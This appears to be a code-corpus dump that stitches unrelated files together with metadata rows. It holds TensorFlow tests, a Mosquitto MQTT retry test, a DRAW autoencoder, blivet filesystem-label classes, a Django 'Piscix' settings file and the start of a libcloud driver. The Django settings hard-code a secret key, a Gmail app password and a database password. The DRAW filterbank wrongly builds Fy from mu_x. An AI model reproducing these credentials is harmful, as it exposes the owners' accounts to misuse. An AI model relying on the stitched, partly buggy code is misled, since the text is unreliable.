# Should trigger the assign.
self.evaluate(t)
self.assertEquals(1, self.evaluate(var))
class AssertTest(test.TestCase):
@test_util.run_deprecated_v1
def testGuardedAssertDoesNotCopyWhenTrue(self):
with self.session(use_gpu=True) as sess:
with ops.device(test.gpu_device_name()):
value = constant_op.constant(1.0)
with ops.device("/cpu:0"):
true = constant_op.constant(True)
guarded_assert = control_flow_ops.Assert(true, [value], name="guarded")
unguarded_assert = gen_logging_ops._assert(
true, [value], name="unguarded")
opts = config_pb2.RunOptions(trace_level=config_pb2.RunOptions.FULL_TRACE)
guarded_metadata = config_pb2.RunMetadata()
sess.run(guarded_assert, options=opts, run_metadata=guarded_metadata)
unguarded_metadata = config_pb2.RunMetadata()
sess.run(unguarded_assert, options=opts, run_metadata=unguarded_metadata)
guarded_nodestat_names = [
n.node_name
for d in guarded_metadata.step_stats.dev_stats
for n in d.node_stats
]
unguarded_nodestat_names = [
n.node_name
for d in unguarded_metadata.step_stats.dev_stats
for n in d.node_stats
]
guarded_memcpy_nodestat_names = [
n for n in guarded_nodestat_names if "MEMCPYDtoH" in n
]
unguarded_memcpy_nodestat_names = [
n for n in unguarded_nodestat_names if "MEMCPYDtoH" in n
]
if "GPU" in [d.device_type for d in device_lib.list_local_devices()]:
# A copy was performed for the unguarded assert
self.assertLess(0, len(unguarded_memcpy_nodestat_names))
# No copy was performed for the guarded assert
self.assertEqual([], guarded_memcpy_nodestat_names)
class WhileOpBenchmark(test.Benchmark):
"""Evaluate the performance of while_loop op."""
def _getInitVariables(self):
batch_size = 10
image_size = 256
kernel_size = 3
depth = 16
init_step = constant_op.constant(-1)
image = variable_scope.get_variable(
"image",
initializer=random_ops.random_normal(
[batch_size, image_size, image_size, depth],
dtype=dtypes.float32,
stddev=1e-1))
kernel = variable_scope.get_variable(
"weights",
initializer=random_ops.truncated_normal(
[kernel_size, kernel_size, depth, depth],
dtype=dtypes.float32,
stddev=1e-1))
return init_step, image, kernel
def _runOneBenchmark(self,
default_device,
num_iters=10,
static_unroll=False,
steps=10):
"""Evaluate the while loop performance.
Args:
default_device: The default device to run all ops except the loop_body.
loop_body is always run on GPU.
num_iters: Number of iterations to run.
static_unroll: If true, run unrolled version; otherwise, run while_loop.
steps: Total number of repeated steps to run the loop.
Returns:
The duration of the run in seconds.
"""
def loop_body(i, x):
with ops.device("/gpu:0"):
# Always put loop body on GPU.
nx = nn_ops.conv2d(
input=x,
filter=kernel,
strides=[1, 1, 1, 1],
padding="SAME",
data_format="NHWC",
name="conv2d")
ni = math_ops.add(i, 1)
return ni, nx
ops.reset_default_graph()
with session.Session() as sess, ops.device(default_device):
# Get the initial id i, input x, and kernel.
i, x, kernel = self._getInitVariables()
variables.global_variables_initializer().run()
if static_unroll:
for _ in xrange(steps):
i, x = loop_body(i, x)
else:
i, x = control_flow_ops.while_loop(
lambda i, _: i < steps,
loop_body, [i, x],
parallel_iterations=steps,
swap_memory=True)
r = math_ops.reduce_sum(x)
dx, dk = gradients_impl.gradients(r, [x, kernel])
# Use group to avoid fetching back results.
r = control_flow_ops.group(dx, dk)
for _ in xrange(3):
# exclude warm up time
self.evaluate(r)
start_time = time.time()
for _ in xrange(num_iters):
self.evaluate(r)
return (time.time() - start_time) / num_iters
def benchmarkWhileOpCrossDevicePlacement(self):
iters = 10
# Run loop body on GPU, but other ops on CPU.
duration = self._runOneBenchmark("cpu", iters, static_unroll=False)
self.report_benchmark(
name="while_op_cross_device", iters=iters, wall_time=duration)
def benchmarkWhileOpSameDevicePlacement(self):
iters = 10
# Run all ops on the same GPU device.
duration = self._runOneBenchmark("gpu", iters, static_unroll=False)
self.report_benchmark(
name="while_op_same_device", iters=iters, wall_time=duration)
def benchmarkWhileOpUnrollCrossDevicePlacement(self):
iters = 10
# Run loop body on GPU, but other ops on CPU.
duration = self._runOneBenchmark("cpu", iters, static_unroll=True)
self.report_benchmark(
name="unroll_cross_device_cpu", iters=iters, wall_time=duration)
def benchmarkWhileOpUnrollSameDevicePlacement(self):
iters = 10
# Run all ops on GPU.
duration = self._runOneBenchmark("gpu", iters, static_unroll=True)
self.report_benchmark(
name="unroll_same_device", iters=iters, wall_time=duration)
@test_util.with_control_flow_v2
class EagerTest(test.TestCase):
def testCond(self):
with context.eager_mode():
pred = math_ops.less(1, 2)
fn1 = lambda: [constant_op.constant(10)]
fn2 = lambda: [constant_op.constant(20)]
r = control_flow_ops.cond(pred, fn1, fn2)
self.assertAllEqual(r.numpy(), 10)
self.assertFalse(isinstance(r, list))
# TODO(b/117279927): Re-enable once msan failure is fixed.
def DISABLED_testCondInDefun(self):
with context.eager_mode():
@eager_function.defun
def foo(pred):
# TODO(b/111124878): this only needs to output one element.
fn1 = lambda: (constant_op.constant(10), constant_op.constant(100))
fn2 = lambda: (constant_op.constant(20), constant_op.constant(200))
return control_flow_ops.cond(constant_op.constant(pred), fn1, fn2)
r = foo(True)
self.assertAllEqual(r[0].numpy(), 10)
self.assertNotIsInstance(r, list)
r = foo(False)
self.assertAllEqual(r[0].numpy(), 20)
self.assertFalse(isinstance(r, list))
def testWhileLoop(self):
with context.eager_mode():
tensor = constant_op.constant([1, 2, 3, 4, 5])
self.assertAllEqual(isum(tensor).numpy(), [46, 47, 48, 49, 50])
def testWhileLoopWithMaxIterations(self):
with context.eager_mode():
tensor = constant_op.constant([1, 2, 3, 4, 5])
self.assertAllEqual(
isum(tensor, maximum_iterations=3).numpy(),
[1 + 3, 2 + 3, 3 + 3, 4 + 3, 5 + 3])
@test_util.run_v1_only("b/120545219")
def testWhileWithMaximumIterationsAndSingleArgument(self):
with context.eager_mode():
tensor = constant_op.constant(0)
r = control_flow_ops.while_loop(
lambda i: i < 3, lambda i: i + 1, [tensor], maximum_iterations=1)
self.assertEqual(1, r.numpy())
def testWithDependencies(self):
with context.eager_mode():
t1 = constant_op.constant(1)
t2 = constant_op.constant(2)
t3 = control_flow_ops.with_dependencies(t1, t2)
self.assertAllEqual(t2.numpy(), t3.numpy())
def testTuple(self):
with context.eager_mode():
t1 = constant_op.constant(1)
t2 = constant_op.constant(2)
tup1, tup2 = control_flow_ops.tuple([t1, t2])
self.assertAllEqual(t1.numpy(), tup1.numpy())
self.assertAllEqual(t2.numpy(), tup2.numpy())
@test_util.run_v1_only("b/120545219")
def testCase(self):
with context.eager_mode():
x = constant_op.constant(1)
y = constant_op.constant(2)
z = constant_op.constant(3)
f1 = lambda: constant_op.constant(17)
f2 = lambda: constant_op.constant(23)
f3 = lambda: constant_op.constant(-1)
r1 = control_flow_ops.case(
[(x < y, f1), (x > z, f2)], default=f3, exclusive=True)
self.assertAllEqual(r1.numpy(), 17)
if __name__ == "__main__":
test.main()
| apache-2.0 | -332,232,264,619,329,100 | 35.87363 | 112 | 0.617802 | false |
telefonicaid/fiware-IoTAgent-Cplusplus | third_party/mosquitto-1.4.4/test/lib/03-publish-c2b-qos1-timeout.py | 7 | 2881 | #!/usr/bin/env python
# Test whether a client sends a correct PUBLISH to a topic with QoS 1 and responds to a delay.
# The client should connect to port 1888 with keepalive=60, clean session set,
# and client id publish-qos1-test
# The test will send a CONNACK message to the client with rc=0. Upon receiving
# the CONNACK the client should verify that rc==0. If not, it should exit with
# return code=1.
# On a successful CONNACK, the client should send a PUBLISH message with topic
# "pub/qos1/test", payload "message" and QoS=1.
# The test will not respond to the first PUBLISH message, so the client must
# resend the PUBLISH message with dup=1. Note that to keep test durations low, a
# message retry timeout of less than 10 seconds is required for this test.
# On receiving the second PUBLISH message, the test will send the correct
# PUBACK response. On receiving the correct PUBACK response, the client should
# send a DISCONNECT message.
import inspect
import os
import subprocess
import socket
import sys
import time
# From http://stackoverflow.com/questions/279237/python-import-a-module-from-a-folder
cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"..")))
if cmd_subfolder not in sys.path:
sys.path.insert(0, cmd_subfolder)
import mosq_test
rc = 1
keepalive = 60
connect_packet = mosq_test.gen_connect("publish-qos1-test", keepalive=keepalive)
connack_packet = mosq_test.gen_connack(rc=0)
disconnect_packet = mosq_test.gen_disconnect()
mid = 1
publish_packet = mosq_test.gen_publish("pub/qos1/test", qos=1, mid=mid, payload="message")
publish_packet_dup = mosq_test.gen_publish("pub/qos1/test", qos=1, mid=mid, payload="message", dup=True)
puback_packet = mosq_test.gen_puback(mid)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.settimeout(10)
sock.bind(('', 1888))
sock.listen(5)
client_args = sys.argv[1:]
env = dict(os.environ)
env['LD_LIBRARY_PATH'] = '../../lib:../../lib/cpp'
try:
pp = env['PYTHONPATH']
except KeyError:
pp = ''
env['PYTHONPATH'] = '../../lib/python:'+pp
client = mosq_test.start_client(filename=sys.argv[1].replace('/', '-'), cmd=client_args, env=env)
try:
(conn, address) = sock.accept()
conn.settimeout(10)
if mosq_test.expect_packet(conn, "connect", connect_packet):
conn.send(connack_packet)
if mosq_test.expect_packet(conn, "publish", publish_packet):
# Delay for > 3 seconds (message retry time)
if mosq_test.expect_packet(conn, "dup publish", publish_packet_dup):
conn.send(puback_packet)
if mosq_test.expect_packet(conn, "disconnect", disconnect_packet):
rc = 0
conn.close()
finally:
client.terminate()
client.wait()
sock.close()
exit(rc)
| agpl-3.0 | -3,187,448,714,301,827,600 | 33.710843 | 129 | 0.706005 | false |
HaydenFaulkner/phd | tensorflow_code/external_libraries/draw-kvfrans/main.py | 1 | 9552 | import tensorflow as tf
import numpy as np
from ops import *
from utils import *
import input_data
# from scipy.misc import imsave as ims
class Draw():
def __init__(self):
self.mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
self.n_samples = self.mnist.train.num_examples
self.img_size = 28
self.attention_n = 5
self.n_hidden = 256
self.n_z = 10
self.sequence_length = 10
self.batch_size = 64
self.share_parameters = False
self.images = tf.placeholder(tf.float32, [None, 784])
self.e = tf.random_normal((self.batch_size, self.n_z), mean=0, stddev=1) # Qsampler noise
self.lstm_enc = tf.nn.rnn_cell.LSTMCell(self.n_hidden, state_is_tuple=True) # encoder Op
self.lstm_dec = tf.nn.rnn_cell.LSTMCell(self.n_hidden, state_is_tuple=True) # decoder Op
self.cs = [0] * self.sequence_length
self.mu, self.logsigma, self.sigma = [0] * self.sequence_length, [0] * self.sequence_length, [0] * self.sequence_length
h_dec_prev = tf.zeros((self.batch_size, self.n_hidden))
enc_state = self.lstm_enc.zero_state(self.batch_size, tf.float32)
dec_state = self.lstm_dec.zero_state(self.batch_size, tf.float32)
x = self.images
for t in range(self.sequence_length):
# error image + original image
c_prev = tf.zeros((self.batch_size, self.img_size**2)) if t == 0 else self.cs[t-1]
x_hat = x - tf.sigmoid(c_prev)
# read the image
r = self.read_basic(x,x_hat,h_dec_prev)
print r.get_shape()
# r = self.read_attention(x,x_hat,h_dec_prev)
# encode it to guass distrib
self.mu[t], self.logsigma[t], self.sigma[t], enc_state = self.encode(enc_state, tf.concat(1, [r, h_dec_prev]))
# sample from the distrib to get z
z = self.sampleQ(self.mu[t],self.sigma[t])
print z.get_shape()
# retrieve the hidden layer of RNN
h_dec, dec_state = self.decode_layer(dec_state, z)
print h_dec.get_shape()
# map from hidden layer -> image portion, and then write it.
self.cs[t] = c_prev + self.write_basic(h_dec)
# self.cs[t] = c_prev + self.write_attention(h_dec)
h_dec_prev = h_dec
self.share_parameters = True # from now on, share variables
# the final timestep
self.generated_images = tf.nn.sigmoid(self.cs[-1])
self.generation_loss = tf.reduce_mean(-tf.reduce_sum(self.images * tf.log(1e-10 + self.generated_images) + (1-self.images) * tf.log(1e-10 + 1 - self.generated_images),1))
kl_terms = [0]*self.sequence_length
for t in xrange(self.sequence_length):
mu2 = tf.square(self.mu[t])
sigma2 = tf.square(self.sigma[t])
logsigma = self.logsigma[t]
kl_terms[t] = 0.5 * tf.reduce_sum(mu2 + sigma2 - 2*logsigma, 1) - self.sequence_length*0.5
self.latent_loss = tf.reduce_mean(tf.add_n(kl_terms))
self.cost = self.generation_loss + self.latent_loss
optimizer = tf.train.AdamOptimizer(1e-3, beta1=0.5)
grads = optimizer.compute_gradients(self.cost)
for i,(g,v) in enumerate(grads):
if g is not None:
grads[i] = (tf.clip_by_norm(g,5),v)
self.train_op = optimizer.apply_gradients(grads)
self.sess = tf.Session()
self.sess.run(tf.initialize_all_variables())
def train(self):
for i in xrange(15000):
xtrain, _ = self.mnist.train.next_batch(self.batch_size)
cs, gen_loss, lat_loss, _ = self.sess.run([self.cs, self.generation_loss, self.latent_loss, self.train_op], feed_dict={self.images: xtrain})
print "iter %d genloss %f latloss %f" % (i, gen_loss, lat_loss)
if i % 500 == 0:
cs = 1.0/(1.0+np.exp(-np.array(cs))) # x_recons=sigmoid(canvas)
for cs_iter in xrange(10):
results = cs[cs_iter]
results_square = np.reshape(results, [-1, 28, 28])
print results_square.shape
ims("results/"+str(i)+"-step-"+str(cs_iter)+".jpg",merge(results_square,[8,8]))
# given a hidden decoder layer:
# locate where to put attention filters
def attn_window(self, scope, h_dec):
with tf.variable_scope(scope, reuse=self.share_parameters):
parameters = dense(h_dec, self.n_hidden, 5)
# gx_, gy_: center of 2d gaussian on a scale of -1 to 1
gx_, gy_, log_sigma2, log_delta, log_gamma = tf.split(1,5,parameters)
# move gx/gy to be a scale of -imgsize to +imgsize
gx = (self.img_size+1)/2 * (gx_ + 1)
gy = (self.img_size+1)/2 * (gy_ + 1)
sigma2 = tf.exp(log_sigma2)
# stride/delta: how far apart these patches will be
delta = (self.img_size - 1) / ((self.attention_n-1) * tf.exp(log_delta))
# returns [Fx, Fy, gamma]
return self.filterbank(gx,gy,sigma2,delta) + (tf.exp(log_gamma),)
# Given a center, distance, and spread
# Construct [attention_n x attention_n] patches of gaussian filters
# represented by Fx = horizontal gaussian, Fy = vertical guassian
def filterbank(self, gx, gy, sigma2, delta):
# 1 x N, look like [[0,1,2,3,4]]
grid_i = tf.reshape(tf.cast(tf.range(self.attention_n), tf.float32),[1, -1])
# centers for the individual patches
mu_x = gx + (grid_i - self.attention_n/2 - 0.5) * delta
mu_y = gy + (grid_i - self.attention_n/2 - 0.5) * delta
mu_x = tf.reshape(mu_x, [-1, self.attention_n, 1])
mu_y = tf.reshape(mu_y, [-1, self.attention_n, 1])
# 1 x 1 x imgsize, looks like [[[0,1,2,3,4,...,27]]]
im = tf.reshape(tf.cast(tf.range(self.img_size), tf.float32), [1, 1, -1])
# list of gaussian curves for x and y
sigma2 = tf.reshape(sigma2, [-1, 1, 1])
Fx = tf.exp(-tf.square((im - mu_x) / (2*sigma2)))
Fy = tf.exp(-tf.square((im - mu_x) / (2*sigma2)))
# normalize so area-under-curve = 1
Fx = Fx / tf.maximum(tf.reduce_sum(Fx,2,keep_dims=True),1e-8)
Fy = Fy / tf.maximum(tf.reduce_sum(Fy,2,keep_dims=True),1e-8)
return Fx, Fy
# the read() operation without attention
def read_basic(self, x, x_hat, h_dec_prev):
return tf.concat(1,[x,x_hat])
def read_attention(self, x, x_hat, h_dec_prev):
Fx, Fy, gamma = self.attn_window("read", h_dec_prev)
# we have the parameters for a patch of gaussian filters. apply them.
def filter_img(img, Fx, Fy, gamma):
Fxt = tf.transpose(Fx, perm=[0,2,1])
img = tf.reshape(img, [-1, self.img_size, self.img_size])
# Apply the gaussian patches:
# keep in mind: horiz = imgsize = verts (they are all the image size)
# keep in mind: attn = height/length of attention patches
# allfilters = [attn, vert] * [imgsize,imgsize] * [horiz, attn]
# we have batches, so the full batch_matmul equation looks like:
# [1, 1, vert] * [batchsize,imgsize,imgsize] * [1, horiz, 1]
glimpse = tf.batch_matmul(Fy, tf.batch_matmul(img, Fxt))
glimpse = tf.reshape(glimpse, [-1, self.attention_n**2])
# finally scale this glimpse w/ the gamma parameter
return glimpse * tf.reshape(gamma, [-1, 1])
x = filter_img(x, Fx, Fy, gamma)
x_hat = filter_img(x_hat, Fx, Fy, gamma)
return tf.concat(1, [x, x_hat])
# encode an attention patch
def encode(self, prev_state, image):
# update the RNN with image
with tf.variable_scope("encoder",reuse=self.share_parameters):
hidden_layer, next_state = self.lstm_enc(image, prev_state)
# map the RNN hidden state to latent variables
with tf.variable_scope("mu", reuse=self.share_parameters):
mu = dense(hidden_layer, self.n_hidden, self.n_z)
with tf.variable_scope("sigma", reuse=self.share_parameters):
logsigma = dense(hidden_layer, self.n_hidden, self.n_z)
sigma = tf.exp(logsigma)
return mu, logsigma, sigma, next_state
def sampleQ(self, mu, sigma):
return mu + sigma*self.e
def decode_layer(self, prev_state, latent):
# update decoder RNN with latent var
with tf.variable_scope("decoder", reuse=self.share_parameters):
hidden_layer, next_state = self.lstm_dec(latent, prev_state)
return hidden_layer, next_state
def write_basic(self, hidden_layer):
# map RNN hidden state to image
with tf.variable_scope("write", reuse=self.share_parameters):
decoded_image_portion = dense(hidden_layer, self.n_hidden, self.img_size**2)
return decoded_image_portion
def write_attention(self, hidden_layer):
with tf.variable_scope("writeW", reuse=self.share_parameters):
w = dense(hidden_layer, self.n_hidden, self.attention_n**2)
w = tf.reshape(w, [self.batch_size, self.attention_n, self.attention_n])
Fx, Fy, gamma = self.attn_window("write", hidden_layer)
Fyt = tf.transpose(Fy, perm=[0,2,1])
# [vert, attn_n] * [attn_n, attn_n] * [attn_n, horiz]
wr = tf.batch_matmul(Fyt, tf.batch_matmul(w, Fx))
wr = tf.reshape(wr, [self.batch_size, self.img_size**2])
return wr * tf.reshape(1.0/gamma, [-1, 1])
model = Draw()
model.train()
| mit | -2,412,362,508,978,403,000 | 44.923077 | 178 | 0.588463 | false |
alexanderlaw/blivet | blivet/tasks/fswritelabel.py | 4 | 3327 | # fswritelabel.py
# Filesystem label writing classes.
#
# Copyright (C) 2015 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
# Red Hat Author(s): Anne Mulhern <[email protected]>
import abc
from six import add_metaclass
from .. import util
from ..errors import FSWriteLabelError
from . import availability
from . import task
@add_metaclass(abc.ABCMeta)
class FSWriteLabel(task.BasicApplication):
""" An abstract class that represents writing a label for a filesystem. """
description = "write filesystem label"
args = abc.abstractproperty(doc="arguments for writing a label")
def __init__(self, an_fs):
""" Initializer.
:param FS an_fs: a filesystem object
"""
self.fs = an_fs
# IMPLEMENTATION methods
@property
def _setCommand(self):
"""Get the command to label the filesystem.
:return: the command
:rtype: list of str
"""
return [str(self.ext)] + self.args
def doTask(self):
error_msgs = self.availabilityErrors
if error_msgs:
raise FSWriteLabelError("\n".join(error_msgs))
rc = util.run_program(self._setCommand)
if rc:
raise FSWriteLabelError("label failed")
class DosFSWriteLabel(FSWriteLabel):
ext = availability.DOSFSLABEL_APP
@property
def args(self):
return [self.fs.device, self.fs.label]
class Ext2FSWriteLabel(FSWriteLabel):
ext = availability.E2LABEL_APP
@property
def args(self):
return [self.fs.device, self.fs.label]
class JFSWriteLabel(FSWriteLabel):
ext = availability.JFSTUNE_APP
@property
def args(self):
return ["-L", self.fs.label, self.fs.device]
class NTFSWriteLabel(FSWriteLabel):
ext = availability.NTFSLABEL_APP
@property
def args(self):
return [self.fs.device, self.fs.label]
class ReiserFSWriteLabel(FSWriteLabel):
ext = availability.REISERFSTUNE_APP
@property
def args(self):
return ["-l", self.fs.label, self.fs.device]
class XFSWriteLabel(FSWriteLabel):
ext = availability.XFSADMIN_APP
@property
def args(self):
return ["-L", self.fs.label if self.fs.label != "" else "--", self.fs.device]
class UnimplementedFSWriteLabel(task.UnimplementedTask):
def __init__(self, an_fs):
""" Initializer.
:param FS an_fs: a filesystem object
"""
self.fs = an_fs
| gpl-2.0 | -8,105,825,313,170,470,000 | 27.681034 | 85 | 0.680794 | false |
mariobp/piscix | Piscix/settings.py | 2 | 11496 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Django settings for Piscix project.
Generated by 'django-admin startproject' using Django 1.10.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'x940f1i%t_@^!-whnfh3=zvjm0=pfnv2)iqm=59r4li#qz)wmn'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = [
'localhost'
]
# Application definition
INSTALLED_APPS = [
'exile_ui',
'informes.apps.InformesConfig',
'notificaciones',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'daterange_filter',
'supra',
'nested_admin',
'usuarios.apps.UsuariosConfig',
'mantenimiento.apps.MantenimientoConfig',
'actividades',
'reportes',
'sorl.thumbnail',
'fullcalendar',
'inventario',
'gestion_cartera.apps.GestionCarteraConfig',
'import_export',
'django_autocomplete',
'django_select2'
]
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_USE_TLS = True
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_PORT = 587
EMAIL_HOST_USER = '[email protected]'
EMAIL_HOST_PASSWORD = 'grwlbpmnvfxlofjz'
EXILE_UI = {
'site_title': 'Operaciones',
'site_header': 'Operaciones',
'index_title': 'Software para la gestión de rondas operitivas',
'media': {
'logo': {
'dashboard': '/media/piscix_logo/Icono-w-t.png',
'page': '/media/piscix_logo/Icono-200px.png',
'login': '/media/piscix_logo/Icono-s-t.png'
},
'icons': {
'usuarios': {
'icon': 'people',
'groups': [
'Maestros',
'Piscina',
'Parafiscales',
'Personal'
],
'models': {
'Arl': {'icon': 'security', 'group': 'Parafiscales'},
'AsignacionPiscinero': {'icon': 'assignment', 'group': 'Piscina'},
'Asistente': {'icon': 'account_box', 'group': 'Maestros'},
'Casa': {'icon': 'home', 'group': 'Personal'},
'Cliente': {'icon': 'account_circle', 'group': 'Maestros'},
'Eps': {'icon': 'local_hospital', 'group': 'Parafiscales'},
'Fabricante': {'icon': 'widgets', 'group': 'Piscina'},
'Gerente': {'icon': 'supervisor_account', 'group': 'Maestros'},
'NucleoFamiliar': {'icon': 'wc', 'group': 'Personal'},
'Parentesco': {'icon': 'people_outline', 'group': 'Personal'},
'Pariente': {'icon': 'child_friendly', 'group': 'Personal'},
'Pension': {'icon': 'nature_people', 'group': 'Parafiscales'},
'Periodicidad': {'icon': 'date_range', 'group': 'Piscina'},
'Piscina': {'icon': 'pool', 'group': 'Piscina'},
'Piscinero': {'icon': 'account_circle', 'group': 'Maestros'},
'Supervisor': {'icon': 'supervisor_account', 'group': 'Maestros'},
'Tipo_piscina': {'icon': 'settings', 'group': 'Piscina'}
}
},
'reportes': {
'icon': 'report',
'groups': [
'Fotos',
'Configuración',
'Reportes'
],
'models': {
'FotoReporte': {'icon': 'photo_library', 'group': 'Fotos'},
'Recordatorio': {'icon': 'today', 'group': 'Reportes'},
'Reporte': {'icon': 'report', 'group': 'Reportes'},
'TipoReporte': {'icon': 'settings', 'group': 'Configuración'},
'ReporteInformativo': {'icon': 'info', 'group': 'Reportes'}
}
},
'mantenimiento': {
'icon': 'build',
'groups': [
'Soluciones',
],
'models': {
'FotoSolucion': {'icon': 'photo_library', 'group': 'Soluciones'},
'Solucion': {'icon': 'build', 'group': 'Soluciones'},
}
},
'actividades': {
'icon': 'directions_walk',
'groups': [
'Actividades',
'Configuración'
],
'models': {
'Actividad': {'icon': 'event', 'group': 'Actividades'},
'PlanillaDiaria': {'icon': 'content_paste', 'group': 'Actividades'},
'TipoActividad': {'icon': 'settings', 'group': 'Configuración'}
},
'menu-extra': [
{'name': 'Calendario', 'url': '/notificaciones/schedule/',
'icon': 'event', 'group': 'Actividades'}
]
},
'auth': {
'icon': 'security',
'groups': [
'Seguridad',
],
'models': {
'Group': {'icon': 'people', 'group': 'Seguridad'},
'User': {'icon': 'person', 'group': 'Seguridad'}
}
},
'inventario': {
'icon': 'work',
'groups': [
'Inventario',
'Operaciones',
'Bodega',
'Informes'
],
'models': {
'Fabricante': {'icon': 'widgets', 'group': 'Inventario'},
'ArticuloInsumo': {'icon': 'description', 'group': 'Inventario'},
'Proveedor': {'icon': 'shopping_cart', 'group': 'Inventario'},
'Bodega': {'icon': 'store', 'group': 'Bodega'},
'Insumo': {'icon': 'layers', 'group': 'Inventario'},
'Entrada': {'icon': 'arrow_downward', 'group': 'Operaciones'},
'Salida': {'icon': 'arrow_upward', 'group': 'Operaciones'},
'SalidaDeBodega': {'icon': 'archive', 'group': 'Bodega'},
'Movimientos': {'icon': 'swap_horiz', 'group': 'Informes'},
'EntradaDeBodega': {'icon': 'unarchive', 'group': 'Bodega'},
}
},
'gestion_cartera': {
'icon': 'attach_money',
'groups': [
'Cartera',
],
'models': {
'Seguimiento': {'icon': 'contact_phone', 'group': 'Cartera'},
'InicioSeguimiento': {'icon': 'phone', 'group': 'Cartera'}
}
},
'logout': {
'icon': 'exit_to_app',
}
}
}
}
MENU_ORDER = [
{
'name': 'usuarios',
'models': [
'Arl',
'Eps',
'Pension',
'Casa',
'Parentesco',
'NucleoFamiliar',
'Fabricante',
'Periodicidad',
'Tipo_piscina',
'Piscina',
'AsignacionPiscinero',
'Cliente',
'Gerente',
'Asistente',
'Piscinero',
'Supervisor',
]
},
{
'name': 'reportes',
'models': [
'Reporte',
'FotoReporte',
'TipoReporte',
'Recordatorio',
'ReporteInformativo'
]
},
{
'name': 'mantenimiento',
'models': [
'Solucion',
'FotoSolucion',
]
},
{
'name': 'actividades',
'models': [
'Actividad',
'PlanillaDiaria',
'TipoActividad'
],
'menu-extra': [
'Calendario'
]
},
{
'name': 'auth',
'models': [
'Group',
'User'
]
},
{
'name': 'inventario',
'models': [
'Fabricante',
'ArticuloInsumo',
'Proveedor',
'Bodega',
'Insumo',
'Salida',
'Entrada',
'SalidaDeBodega',
'EntradaDeBodega',
'Movimientos'
]
},
{
'name': 'gestion_cartera',
'models': [
'Seguimiento',
'InicioSeguimiento'
]
},
{
'name': 'logout'
}
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'notificaciones.triggers.Middleware',
'Piscix.middleware.ThreadLocalMiddleware'
]
ROOT_URLCONF = 'Piscix.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'Piscix.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'piscix_deploy',
'USER': 'piscix',
'PASSWORD': 'admin123456',
'HOST': 'localhost',
'POST': '5432'
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'es-CO'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = False
DATE_INPUT_FORMATS = [
'%m/%d/%Y',
]
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = '/var/www/Piscix/static/'
MEDIA_URL = '/media/'
MEDIA_ROOT = '/var/www/Piscix/media/'
| mit | -1,835,587,032,274,588,700 | 29.56117 | 91 | 0.485249 | false |
apache/libcloud | libcloud/backup/drivers/gce.py | 31 | 16808 |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__all__ = [
'GCEBackupDriver'
]
from libcloud.utils.iso8601 import parse_date
from libcloud.backup.base import BackupDriver, BackupTargetRecoveryPoint,\
